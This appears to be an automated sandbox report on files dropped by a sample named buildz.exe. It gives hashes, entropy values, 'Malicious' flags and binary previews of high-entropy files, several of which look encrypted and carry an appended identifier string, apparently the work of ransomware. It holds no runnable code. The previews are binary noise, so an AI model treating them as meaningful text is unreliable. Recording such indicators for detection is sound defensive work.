                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1737
                        Entropy (8bit):7.891093171448699
                        Encrypted:false
                        SSDEEP:24:j3Ck0iKuAoEON4gLvJ4kFIDUhwZ+TqdTIII6QqkNRxM6FISMAtS58vno+eRRdyNg:+qgO2gN4kFI1ZIIyQIIj8/oXlyNHUD
                        MD5:A1C79404233E78BB32D5B243614E8944
                        SHA1:3792FFDFF88DD39232CD245B4DBCA01FE43A04F1
                        SHA-256:C74D8DBDAE35688626CBCCECE2B451A3E837A5C8686AF36AFAB3B5219C4D560C
                        SHA-512:5B4C4B9BA883E6082761260D0A00DBC1CA9F84392EB7BB17798C803095FA6F0E9EAD09D7E6777AD85F4FDA502C630D63DE1C50553D9EFE2643531C4F9A4E00E9
                        Malicious:false
                        Preview:<?xml.o.J..H......&...F.@.H.i....:..|a..:.!..N.M....`....,=.{....w.~...c%....#.,.....J....\...Vl....G..Z2WtI.!.......5s.d..4.>.WVRI...f...v...B.l..u.'..bi...@\;(T.....,.2.....(.2V................Y^.....O.SG\T..~.O..gD.s..^.G.U(..g;..2.6W/".......y~.2...s.{......sp..{c.c.B..H.2S.3....8.x,.Yb....EfNs.....'f.fS...7..2..{.6!.._4J.c.."......Dm.n..Z.9..8[h.r.....p.Q.........V._.P.w.rv$P....s{...8.....,.]...=.}....C....'P...#/.*..^=.#)...h.c...3..I........j.Kl.?......$].p...B....9W^DI.,..n..0*...\@ +bs|.>=W../.$..B..k.jE...&.....PO.p...l..l*U.J5.'...D=...3.u...(,.....X...#....w-...............E..j(.1E#g.h..S.lN..T...&..."609L..j.|B.;.z4.......H...p.j.+}.D);.]....y4.I...YI.tx..}....S.K`p.\B.Z...'"P..6I..j{...Q!L...*.W...............%...dn,I.A...W.K~..n...6.h.\.Dn!?IP...:..6&...q.\.....3..0l.D.c......d... ..8..p9.....cs.r..V..z/....|.5..:3kJn".#0...155.$.i.:..4a.2.1..K....H#.R....v.Kfp..e.}%5..iO.8u.[.Y...../.....V..A.c....+n........Z.J.bna.q..vLc.L..".*
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1448
                        Entropy (8bit):7.862674948030665
                        Encrypted:false
                        SSDEEP:24:aUKEjsd4/drJq/ltIGj5ESd8LJMQ+Rb1q2IrenR9v7cM2xTUaWZtjgRu1orbBvGX:arwsdIBc/ltpll8LG1fGeReM2xIZtjgU
                        MD5:52A7CBE9D42D61FAFFAF99D26DCD55DE
                        SHA1:DBD8C88CD51436376B5BDB47865558714FEC64BA
                        SHA-256:567E05489A4E5928E5B30CD8A5944A7F386227AC40706E7E889694CCE1435622
                        SHA-512:A3F4C293D18FD483086FEE534C11B64DC3BDEEF9D3E35190F3A35798022BB29F193687FF1C7F9394DE42D970CAA2DA626B3D6DFB1BE0E27502061B5592A5F371
                        Malicious:false
                        Preview:<?xml......h.A..4....I...Tj..q..&aP.+..Pd1...$lb..Nz..m...E.....N.....H\r.....1\.(. ..$F..C..$blo;p..8.L..tq.....n~.]v.7..p.p.... ...........!.l...l]..f6.!.j...,....T..7.....V..7..D.yj.PU]...gj.;!..^n.....#.AZp..i..$......5Q...V...r.$.....;.+..1..V...zX..u.....4l.(.83.|.FR.....+ds..t...lm[-l".......<E.n.......z.(]..,.......7............>.+.K.n.._.....s[i.!.^o.m@....W.X?9S...Rl.Y....#....!.....c.}....S.....w..(..6,...y.BC...&\".s.$.M.b.O+......R..l.v.o..\..s..3?.).4..@|/.j3'.~...p.3N!.....h........-|..(.....|.m....Z-..c.mc..p:/.6.a[(].C..#.v.O.yT.2..)m.........?.*..!Y.rB.......$..:.|GM.....c.u..R.$-P..j....{.`.V3...X.....%..x..a.CB...~]H..+.-..b.h.N^..H(.?...<5.>....J.........%....dq.o`..o...L.]...3.g/3#.(q|...@.K.!..Uq}F.()..`!.}....n.+.*......!..{.<...w.)vQCl.,ksx~..9O..].~.e....f...U..5.k.}/.R.GH.....E..\.x..P.....'.&.J....`.....Sn.Q..Te..yS.(j.....u.5.Z.m....`...\.>..,...Q...TV..D....H.4...'`g..l....O...2.=..l....).\..N.sl..Z...(......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1419
                        Entropy (8bit):7.843308167685456
                        Encrypted:false
                        SSDEEP:24:QaJ4dH+BbaizGLZcxdcK13T7Th1yKUHpJepNEN/Ajlw0pcQSgxvXkfTpGbD:Qi4dybpCwWKlTTtUHPPs/GCxvOTpUD
                        MD5:D4545E65E025977F666793C51A1C069C
                        SHA1:61315C6E527EB349277947A53CD5C897BA7B4763
                        SHA-256:F608031ABFBE42DF631728C9F863E1A589E5DE956321474FA3BC553BAC0FE383
                        SHA-512:F3756BC0111259C09B7FD8AFCE9D0464FF9DCAD4700BD2CC9D30F1D0AF0C6E81B1BDA97ED36CF773136B4358A9C231F98F53B7E029B595FEF6EAE9E49DB29AEF
                        Malicious:false
                        Preview:<?xml..'q....._bE.PU`oM.]L..v.@;n.kN.|.E..Nw~...!0l..G....=.{....K[.....wA.....*.f..c*t..B.c9Vp:..C4D......iT.v.;m.rg.9..!....Yo2;..0\...k..w.........R.CK..7.]/...w.)...j.r.{r0......??.1....R.!V...}...&.......2......{o.f2L...VX......F...Q.%(ZnG.!R.......1........3Vit.....|..&..R.5..[.._..Z0@.\...3..26sG....:s....J.._.H...W.y..-...=..%...x.\....H..yhu.+.......1.$........l...u.#.h.....B-..>V..>.,).I.MD@>.F.....V....NA.+.....wGZ....lg.|......p..'.37...~......wb<<5Q...L.'2X....BH)Jh#..:..{.<.=.".+...`(H.z7O..7z\.........#.1..NV..b...!{S.J.{>..a.\HJ.L{..t.......Q. ....Y......8.....%WX&.N.6...2".u 6...G....Q....$.z=*.L.."..<..A{..(.~...4;.%...........^=.y.......3.ZK....Oh.2.hp...VSF...k..........'k7....J.l@4Q,7.....25p2..O..'1...SE.I.k2.C...Q...R...P._.A...o..h..%..TA....G..T........K.wSn.....g"E-M!.~.......tb4c=.D.9?....R6{E.t.i.....Q}z.@....6gwM.r.Ea.Y.L......W*..CX.=>v.l..(.i.yQ.Z&...!^..he...%.Y.dZ4.....Z=g...*k..P.7.v..aZ...*....6?G{iIO...G
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1546
                        Entropy (8bit):7.865444938647368
                        Encrypted:false
                        SSDEEP:48:C9uD0vaiY8PLHVLnKJMqZbrWOgGONzIIgNUD:C9fy8DHVLKNprW3zREA
                        MD5:B1BA4B85A4D53C9D9FCA88A8E48284B0
                        SHA1:A35938B9925990D24A4E3EB462B9C3EEC8E6DEF3
                        SHA-256:FECB9338AD59229FFD6A0F4763ACC81D2F575EBD8E3B002A6D490790A69DE134
                        SHA-512:B444D989B40BE9084E98EA3E520B709DE9A8CF64D652D1B235888A0E09EEDF352271A0C7B1CC13BB9514A584C6E1B45DCF82F44A08A6D48E696C8C08AE831484
                        Malicious:false
                        Preview:<?xml......i2...F.V?.n!...z....|..C.W..g >..#.....U...v&....Q...5..gTjw..8.../..^..?..84...#%;r....D.....g.A@.DN77......(.,..>8....Rc3.5t..........P..K........G.N....a.].z....X]J%.0$.k}...4.yd.]|..Law.g|W....<.h.._.)..W{`..MB..~^.0..AI".^y....S.DI.."....o...0...L.7CD..P.-t...~_.k.6..oV>c>I....S.o|.....M.*.VJMCJF].;3..pi....I..h...N....h*..W...zX...A..Q.EH..h.fO.y.`{.l..1:1E0...t....U.....@Io.f.$..../.1.:H...].2..S^...5....G.._..'..+.Ry9'.y.iQ...k.w..S.DJ..........#..v.....-./D..:....Fn..#...F...R.....U.8~7....f...=.X=f.....[.mKc7..=)5....h..&...|....U...r...'l.T....*">oJ.S....W.*..i.._!.F.....Lk$_F.+.......lJ ..'..........-....)...d.eE..`.k.....l1.../W.*H...yq...0....}e x.........g..){.2.x>{.."<6.......H..{"..et....3.{.8.&.\z...A;X.W7......W.d.}.X.'..$....2..fe.V.T..M....o....f...X..Mknw..Ch................_......6]O.....F..._s.[..,4...n......^o..k....v..s0..d.u.9..sJ....|..(b.7...x...m.V......3.t.<.U..s...Z....\.....@6...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):903
                        Entropy (8bit):7.732666324482455
                        Encrypted:false
                        SSDEEP:12:vFwgCj2FUXwpPy1be65kMb+od3fNbkVYtVzQvouwL+zUNczoe95Kki4CXI26GciD:v+I4M6hH5kMf3fgoNcztiaGbD
                        MD5:AED5D22EE3D4CDADB71CA0D63FB03E46
                        SHA1:E34D961D76A02E24C41BC9E070D6BFC146711F78
                        SHA-256:AE7E066DAB8F7C94C922267FAD9AE833A84FC8CE5B083D00E4CE699A96EE3633
                        SHA-512:FA6393BC42A5901B5F109B4D25176911129AF291727DA17ED40386603D39E0D0FAFA7F34630BBC45F6F26477D9858B811800406943EEDB2AF929700ECE9C0AC0
                        Malicious:false
                        Preview:<?xml..Uq(.......>..`..@.y....a@ eK`.<6.b.=..z(k.\..N...X.A......,rb....|....<...{SI.o{=,....*.."..K.E.s9..3... v#..s(.N..}.?..w...L6./H.X."]4..r..s....&.......l...F\&...l,fS$,..|.yX.O.....S*?k..7(q.-.?.I.]3<Sb.F...;.Y..r......gV..VW..-...F.z...ECf/W.Q.sR.h..........LW.......!.z.|..9E*../-m#.(..clK.F.....V.!$.>..MK..g!bL./.X..p....Q.C...NW....'..".i..pW_^...T}2.X'.*%......>.G...\...&i.=z.t..G..Ax...".....I...+...........`.M...N....0.D..a..._.b:..!z..w..n.....A....[....~.9...Fz.sF}._#.....IP...Nb.u.:[...de...d.v......Ky.j...Ao.......w.g.mn*.t,AvzR/.>9..\.(.{#E...{GA....`.L.Ke.I..9*.....u-.j.Nb\...L...\..7~e&.t|........a.V.Y...jo..^.}..z.n.M..Zy....R.FW.=..z....y........A........h'.sy.\.F.|`.../...w.......r...*....qR.g.<..;....5..@..NN)Z.v~.URRiB .5bV.8..,._..a.K.SFK..&..."EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3566
                        Entropy (8bit):7.947467523892517
                        Encrypted:false
                        SSDEEP:48:w/QVt89+PreUE8WWdA04RBmOlwscYpyT/79UyY+rOOVosO4sf2KDcD7ooQii5wKS:wVDziQmnsRpG79Jd080Q9UmeA
                        MD5:C531CEB294EC8CD1B411D5C2ADC203E5
                        SHA1:F407099AAF921550FCF286444893D3A54A66BC1B
                        SHA-256:FC7275475098BB2189F644D369B9563688822320D8188973BC4D0545B45E91E5
                        SHA-512:52EB4AB777F19E9E4ED793B6902865F44329F1B95F9117081DCA34D63F522F425936E8976AC6089B07F87315234734418988C8131BEE2C80CE6BB54A4AA7DE80
                        Malicious:false
                        Preview:<?xml`\.;-..B$..[.X:iZD.-E.........jBg.Qt..=}.?P.7(+.{Lx..:?2!.n...S.&.....(Vn_....pP-2b.g.%..w.E7.o....r..%.......or...n...T)m2i#0..v.+....Ti......+gF.P.f..bu.........*.).~.<.E3{.M..D8`e...K.ys...!.cn.5im;...^..i....G.#.%m@p..k...#.?Z)H..u......0..0I.#........w...#I......>.d..d.N.E. ..g....T.. ..i...U.cL @)cx.'$..S.u&...ib...'..V!B.o..Y....-C..m...wa.l.cS..n\(.a..}.xQ1...3.5...~..^_.m........b....:.$..o...o.\....F........b_...w4.KL......f....1.<M....wR'.y.o9.....R..(..D..A&..s./I...u....+u.`.x.LoE...&.....-.......~A.x+Y..O._.*.iQ..?8.n../..xakO.w.-.!.<..;....s...6..p...Ae....)...'fB....I..+^.;2..u.....<|..0..@.#...........[..i...7Px.%Q.v...'l+>.....Q...j...8_Y....U..$j.s....X.S.8b...{...Z*...0|.#.`.0..W..#..d..q.....(.u.r.0N...m.....1....0!Xl+..h.K_....$..@.....a......Y.1...pj.g....L.#.h.!..C........SB.".5r...e3x.L......6].Au.....h8u.....F.O...3....<.?.T....].v.zK..'.dg.9..(..G.Z..w..=.(.....v.E....?..XV..B.....:..8n../T."AY1.c.i0.M.h.{.d1...F
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3677
                        Entropy (8bit):7.952007663618014
                        Encrypted:false
                        SSDEEP:96:f9BooD2tmYZKnzncsreXbsoyROwDY0nmk93GhEd5zqA:fHjYZWnc3soUDbmklWEdhqA
                        MD5:D76A74DC61A77D885473BF5CCD0A5A44
                        SHA1:F88573BB66AD25418134D76E26E3CC55D14A294A
                        SHA-256:0CAE0A5B62AB94303E988E25FE10491F954E391E1EF708C9D5B7E9C7E21EF52B
                        SHA-512:37077326698179FE0E16845D632C4BD90C3CBEDAE26DF5B83247D53EB4D40DC3D0C0EE832D02BCEEB4904963A40FB8FBE2D1E98DE88C1B407E38303693AB9C7C
                        Malicious:false
                        Preview:<?xml..j....HE.%8..|~..9q.7..1..Jn_.k.&f~....?...~.8.'..i/..R8.".0; ..)\../..x..x.._kV.-p..O..W.c..J....H..=(t....<../.S/......._.eB..,.4.m.....<.40..b2.Lj.@...:P,.....O.....3G|..ys..N..LQ....L.N..s...,.>(...7..$.$....Up..|r\8.{1.."(3>..._.......U.O..3..J...`....}..5...nVR.Y..C=. V|.x@.v.r....'k.e..S...I...Q......oS^..!......|...9..OA.~;..m)B..?.k..8....Y.p.....Z...D.....3..,/.Z.B`A...TT.....Wc.......DMTc%IV.RX..?.*...&....4)8..S.....i.V.[........ej.1$6........:D..?.Q[.6.x..L..+/..y..M.a..5)0....WwM]+.....P..5..y...$z.`....AgB>....."...scF.}1.'t...,......~R. 5(.D..h........RR.&.}..o..UO#.)..d.\..V...(....U..!.........1-...>bKda...Y{.J.%..U..[.....:.)...P.R.Y...g.nFwa!.D...1..J.....jL....r...f.jp2xM....Y.a......).F..M...t-...E[...f..)I.y....h^.j......Ho.....&j..l..g..........."y_.E.....`$..."0....b_.6P<<i......p.....p+...."5...z3.).&_J,.....W.*.....5...HO...l.J.7P.......E..L."................n*C...Z.)_....Q9...0..#..........u\..$L#...2....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):744
                        Entropy (8bit):7.674525922684817
                        Encrypted:false
                        SSDEEP:12:0f7Idskz2EITcMAdOL0QGM7HUVxUn3oT4x2M7mXuK8r4jsouPQlP6F26Gcii9a:0fUdBz2qMsQVUVxU3oUX7mX/srmP6RGX
                        MD5:7C5A141C659B3961562750DB84DBB825
                        SHA1:A908E5794A3E6BA4CA28D96441FF4FA204CCBDA1
                        SHA-256:BCF0DEACA94BC3B8F92AE744A6AD5B1C3EF75E57883E94C40427F5F802208357
                        SHA-512:F796C012BC87E86E1D1B7F195A98C05D44D8961AAF3835EA567AFE79FA12194216827ECF31BFEEF684DB0B2343F22054E01142B5BCC393DB24A16BB99D3AE4E6
                        Malicious:false
                        Preview:<?xmld.U(.......`n..M.H1......br....Ux....7...1&B$..P.....T..?.h..`.F..?....|m.gc..i.3..T...g=twa..e-tBt..D.Ssi_.g.....5B.......O.J......f3..WS.1....3.6O...".e.......De.gM...I.<.[..).]...]G_.."..P...E...>.x..b.....p..!A....A2.u..E...*..:T...}...G.qst..#.+.j...D....Ja.|.x'....<....O..b.~.>...S..WD.....].uCV..\.V1.b.WEl ...m8s~<.Yl...y.]!d..a?.......W.h.....?t.k.W.w.w...Vc.F..2.*~7....%X.e'....-...*7.?.4%..sy.G.k.>..<_..A...N.>8W..saA..6..%.d...v...+..K.l..w.....z..me....|..H.q..P....EO9.21...AW...|...@.....$.~....S.Q.`0..Fq.z...!E.U......o;..ff.u..nD..=hv)~x28..f..3v..B.....J..8.......i./s.\..X....({.8..u..4..*...@f.ob.....).y...mEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1620
                        Entropy (8bit):7.879161470210518
                        Encrypted:false
                        SSDEEP:48:4hHHV3SfJCAx9PAE3AG3M6zUGOaP7CVmFNr5OkWIUD:wnVixzPLJ3H7CVCNrpA
                        MD5:69C5B89C0316BD19CA2D1006DE1A1FA1
                        SHA1:3FD8C20C8A211C98D6338638A7B7919BC5F2A932
                        SHA-256:B141938CCE201B3C07D478C62A500BCD9CF6467F52ACDFB112F159C4D90E28D9
                        SHA-512:EA8F7CF8B10476DCF2745B592F211F1EC75E02F9EE4CDC1C80D74A353AD85E856889A2F20193A3C13F5F11997EC33BE28B7EA94C226DCCDE2BB67946434B666A
                        Malicious:false
                        Preview:<?xml.........<M........o.+.".4.eRV....gL.....U..U..l7p....a-.'....?.Tc.oK.~q.\.4......c.K.$;T..D#....Y.v.Z...!..}!{s."...[.......\..t.T....w{.:..".'v.......s..xF.qm'..`....3&`......M...P.....j..Q.ug..'...g-..h..cV.S.w.5.>..DL.......^,.LW..]i........?.CHe..;.1.....?..@.Gx.O!9..pe.....n.....,".3..F",...OFp._}.......Y.......X.Ju..ubm0....s...%.....r...g.^...|@9....E.1Eki.R...ZL...9..N~Qr...@.v}..t.RoL...P......r.\..u..U.#P.=..U(.... ....h<....n.q.JO.&.8<..?^.>T~CV.x..9N.?..N7..9.8.DA..TF..[...............}...8.,......"...X...v.|...Jf.`g(Q..[?.....n.....b.'..=#d(^.7~....k.yw.OC....%.%.g%..v.sg<p.^.+.K&...O.k.$R..;.".5..U."..^.2......).E....ESw&i8.x.D....k.!.P..q.#T.H.t....p....;3..iA.... ..h..(..8.)....NhQ.*.V...M.6.D4..v.6Uw..`...[q.Bz...9...$..X...c....F....g.....{..@.@...&..).s.]..(.\...L.......Fu..3..:..........G...~.V...j..g..}ivpq.8..q1..N......4.#I..A.".{.3.............v5..w.21F7.=X...=...3..T.D....G.\.'.6.%.....vqI..&..m....n...s....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):821
                        Entropy (8bit):7.737719715449263
                        Encrypted:false
                        SSDEEP:24:27cNE4yysixdIyPxj/t0Dm2leQtf1JDHyv4lTGbD:G1sbIyPdtUl7ttJTyQlTUD
                        MD5:F9CEA6582186FBCBB08FA13890CD5866
                        SHA1:11355A08DF2E5AE9FEB2DE5CC584947BC7638A81
                        SHA-256:46C9679CB6EAEC55ED1AE825B488317E79E0BFB8509FCC2CBD921EBEAFA2C139
                        SHA-512:03AE4BABEA464BFED6990B536198CA7E708EF983F8B19CC558C630405F8F28E0179884C9E57FF1B7870855DDB256B62464C4D12EA75EE544031124D37F38C5E6
                        Malicious:false
                        Preview:<?xml.X.X%.s..0h..(......<?s....I.....\e.lb.R.....D_...Y.BK..`...>k.>.m..'.....=i..8..9...X..u.8t.K8...........t......~._}.....?....Q.f....b...........u.....#$.v.4^.; ....E..&f\....Oo(.{f...x .o.%.,o.x.]+..]..8.H.{+..m.ax.=...\....w..x.q3.)..3T.o.1T.T:..?...$@.../.f.MOP...z,..$6...H...H.q..Y.`.....h .y..x.K..p&....B.$...-@.#.[.L...jv&.R.n..NTnjp...BS2$....D.mi.@Aj...<.Q.........v.1W..J.*...^...z.b.2..g.*..._.ezB..%l.Wt....\.s2.&w..NY..e..PI].....d/.DMQ.......Cw........wg....h.7.C..^...!2n.J.N..-...E.,.e.....p.v6.....L...J.ae....>...8..Q.\."{...Z<..\...I....7..:.......;)...,./9W9._.T.../........6..9.1.]S@.4...SN...Ln.y.....e~L<....9f.....e....s.D~\Z....Y?}..a...D.S....4.....W*.Y.-Za/.b...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1098
                        Entropy (8bit):7.825959793052474
                        Encrypted:false
                        SSDEEP:24:64zfJhPW76yVh6+kvSTC2Abgr8IPiBCkmlHgW2jq1gTHGbD:6SxgeyKv2C2ouIUkKDyHUD
                        MD5:CDAE0588FC36D51416DBEA2673DF5785
                        SHA1:13D42851625B9FC53D22B56EE41B0E78D3C99441
                        SHA-256:FA7BEC8E95F31C29EE4CE908E17E51635B2981C4F5D6A80D38B8C79088FA6460
                        SHA-512:18ABF8B0A836D5DDC417A4C1242B08B71DC4F955CE70BD5A48E2D9557D94CEC8435DED8D951A818B881AB60837B7673DB3D41A16F1DDC5D5EC498F7B39A88E1C
                        Malicious:false
                        Preview:3.7.4..x...`&..(.u.5....y..E..;...c.g...DD..A..)..Y......s....E....'e..u/q.X.MF=,\...b._/DI.i/.pW.....5..z..%.....7i..P..}..0.E%.....z~S..f..\.........a.... ...i..@.Ua..... ....kQQ.u.30Rb........-..q/H1.t......n.PqV....)+uZ|.]..;...C...\.I2......n..N.^.$....]..pjz.../.i..K....z.9.2.A..r1;@6..\...^......]d;...d!+77.*...U...1.....9..z.re.:.0..)Q/..!R.Y-Gm.4r..k..N~0...[.s&..p...Z.....7>0........>f|.N...x...L"..U..Y.S.]p.4.x..]..N.Sz."#a....P$s.*x.......,..+.Ze.C7.m...9..3......:..........e.Cd'.*..Q..)....&.....E*.S...x|..''.."..=.....I... .F.........1{..s....DXj..;j.h!..o...r...X.o,.....$.E'i.....K...S^y.(..x...;.o..F...G..F...D.[....g/Rf..w.O.L..M.y...WI.b..J:+.....j...(+...J..mj...w..e&W.V.(....f.<r.3$.k,36.F..x.. .r.b v.e.3.=......j.ek..V/4.pD....t..C.z......SR...NJ...13.].....g2/.R.G..V0.Q... .....n..H7"+bw...&..{.{...".v.^y1f-.........."I+...#.....f..."7k..._.?u......6gTr......A.HL.........Rz @.W.n....q';..0...1R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.99149572574823
                        Encrypted:true
                        SSDEEP:384:adqJlosQuTHol0pKIU2DVqdD/+SXSlcHwx8N/loycsHhCHDiFwyvGY8OSA:adqJSszs6M+5aaQHFAqhs9dA
                        MD5:B9B1BA414AC311DCD5989FDC9EB903AA
                        SHA1:B041830F6AB4CBF25FCDE3247A854D0536252062
                        SHA-256:C6DF9D1B62B27E3AEF9B466EC0BB697D233C21BB40B424563692106DFC989BE5
                        SHA-512:EEBEE8E4801E7B65D827A85E0FB074F79933D297875D00E81D0D3E47580020DD709230EA2F75957FD3289987C18CB3B67DB2DA8C26D5416C13FDA29C9AC0E7F0
                        Malicious:true
                        Preview:SQLitP.L..wc.;..Gs.].x.p....w...Z.K.m..?..F;..#...".1S........wn....~.....~..V.<...|\....M.R?...8..a...2,..LS..VK.....P].q1....^lO.,.F..2.Gc....].]...c..N1b....,Bu...mTe..j...i`d.el.X.e.].....v....w......\...S.R.Iv...m.5>7.au.q>.....oS....Q.<Z.VQ.M......."..C....#.......T.p}...j..R.|...P.....b...L...aK4+Y.ho..z.p.....v.......h.Y.6.:...x..!...i......bi....Q...... .&...~.e....n^.?.Qb.C8.?..R..O.Rw|.......W.@...E.q....u......)....CcL<.D7.s`....&.IF....z.<....\.:MeH..-...'....u*c@...C..j4}d.A......L..W`4%b~._..~.w...|"W..&.*.t...&d!.....8.,Q.j5.kl6..2..YV...:..*.X...,.......!..1..Ov3...#..E.[.X.S..0].y.6.(S..|.0...BP.M.)0.`...'..%k..|OZj G...{..?;c.....)?dy.M..|-_.O..p..].d.u."Y/........q....E..[.uC4..i.t)...P......7.IQ9..D...Vp.x....#.:.z..k+...??.Y....C..T..........lK8.a....S.......a.. ...q.U.....Dc..A......}.q....w/N....F.@.e.GNjG:.R..u...z?..Y...|k;FJ..>3....Cx.S0.HW....u.....diR_...7.g.V....i....2...w.&...>......ZW............rp5Tc.A...T..R..D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.9928370551062855
                        Encrypted:true
                        SSDEEP:768:yvwGCljkfGvYptxgcAh85vyxy3erRSvBGKHA:fsNgV85vyTMoUA
                        MD5:E6C0B3EA23694EE6360C6C911C306534
                        SHA1:D02C2EF80CA5E7E13CB53E9A0A940581433E53D0
                        SHA-256:5A182D2F5AF001972798D5E4709EF38E041413921ED8518B0BD735D3265DD60D
                        SHA-512:2DD434206E527176DB03FCE456E69BA857FB8518F7E75CE320F5AE66FB85CA63BE9EB9FEC2894EF5B6C8E74ADCC4D4C82721602FD03134CD45C2CCB2335E0848
                        Malicious:true
                        Preview:SQLit..E..n3...R@?..D...;CW.6...;..C~).w.C.Msn&nG.....gn..l..]d3L..oe3w..[X.5..RAU:h....?..x...t.....Y.e....<....S8.UL=O.s&.#s..MZ..k^F.{....0E.]e%..4.?oN=/.....[..`.........I.%...2.......B.....F^.z.Y.5..|.......v[...P=./.`...U.;.>..#.).L..._W...U.d.8.:..s.M..Ryl.._0.....F..3.4......?.5...p.l.5.ke.,U.2.N2..]....cr1O..7.....?..~.....gF....ht<.&..nM....<.V.7.d+....do.%kU..T.......k4...A4...%a.d.:...WO9.P..V_B.w...M.kc.tF?..R.@.....d.:v.>...d..c.C.t..7.r...z..*.Q.8.?.hE..."..o........:J`hp;wCr...>.v.fK...|.+.b............sV/.r..B``..gk..DY.p..r_G.>>....1F.-3....69...t.t..N."...$a.~..FG..*..$..s...~...|v.M......l.......K...&........wVM..DWC.)c.G9.+.p2y.$.,8~...%.......gV\%.5....I.....s..la......(Z...O).E.6x}.rP0/..l1..n..`j.050r.f...N.E9..nx^{,..v..l.l~.J.H.1Ah..,..y...1tcIe.G...0d....j^&.....d...?.^..J.,ry...=....co.P./.4......J0..5....h...%....S..o.>Wb.=gHY........W.I<..^\.k.(_...I-..s.)6...K`0...{..pw...B....\v.H...&.....T..t...j..".
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.992502053034265
                        Encrypted:true
                        SSDEEP:384:PcHsSCKNcR56rgo6z4fb4bz41g+Vz9TwXMw4Zzo8WUh46H8ptG3PqP0enBiD1HA:XKsUrgRIb6z4n5TwXWkqcpaqPFnB+1HA
                        MD5:B065E6A1D9620197A4E612C6E1F498E7
                        SHA1:5B7AC500AEFB0AC7B47C43E00674EE43457C397F
                        SHA-256:B554F581EB2C743B53A081A8EBE0495CADC5C233E27138E05AB117176F9F65CE
                        SHA-512:2A544A2D674FBB89259258B1768AB097537CBB10636929023B93D722E2B4E25EDCE66C5199059E3106713289C641C796A3BAA47AB8EF49C0DC2A687782663B4A
                        Malicious:true
                        Preview:SQLit......u...\.&.>&....2..m.'\.._..k.e..3.^!..gS.vx.bk..T..Do..A...?}..z.m.Z..m..-.J......}u.(....q7.y....+...{..4.....]..YI.A.....2.K"....-...._.|..U.8mu"..~..".X...0....hx...ys.....3..X_J...J.#....}....[..".:.!A....s8..[..W$...3OBYWD..BJ16.`y.......8.....A.....1..\.....(...-.\..O...I....Z..uEur-.$..Dq.f$.?.{..Qp...`%.+....,4.q...V....3......x....s5.`.!pW.[.6.......+....m..f.J.sa.j..Y.Y._.ly......m...~....b....x+)..L.8...3p$@E0.......2__........\b|.....1*|..B.=...;... .5/.&r*pE.....J{......."..`...u....n.C:...Rp..S..-g.....rE...{.[..d.sy. ...P..%.........@. .}.K..C....;.*w.X)..^|l..[..%E.. kv.t..yaZ.zn6.r.A.RT...I....x...<...S....@ |.g..I.i.(...V)...M.q..^...]..Q7.{.....l.T2...b..{..l..J..Xw:..p.\J.....le.?.**")u...........n.<..Kt..w...u...*..* ..!.+.?.n...koMo..V"a.{m.GO.5......^E.FBV..,2...xI2....WyZ..F.r....{m.o'...:^.......C*<..-...s...<...GZ...D.Y..U..... ....=.S.`...=...=...rN...]CI."..g..=.t4.X...9..G.oO.-."^...;.?..-..bi.vC.e.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.991932853942327
                        Encrypted:true
                        SSDEEP:768:OzrSZUmKuvkRoUkTRFlotzQIHqn7EP07A:iuvkRoUkTVWW73A
                        MD5:D94B5D9B83E7D3E8A8BFE4A43DDFDF85
                        SHA1:58351E344C933B70906AE7458A726759168160EF
                        SHA-256:BCDFFF3362357340421F3E44E0664F3C200AA282AABD89EE971C726285BF7BCC
                        SHA-512:D04B2F0BC2A319E4B522497EA59230DED5379724126062E065D68274636EE3341A688FC3752430012DB8AB5066365BE2C2A1006EA2CCB9A67BF6EDE7917FDD31
                        Malicious:true
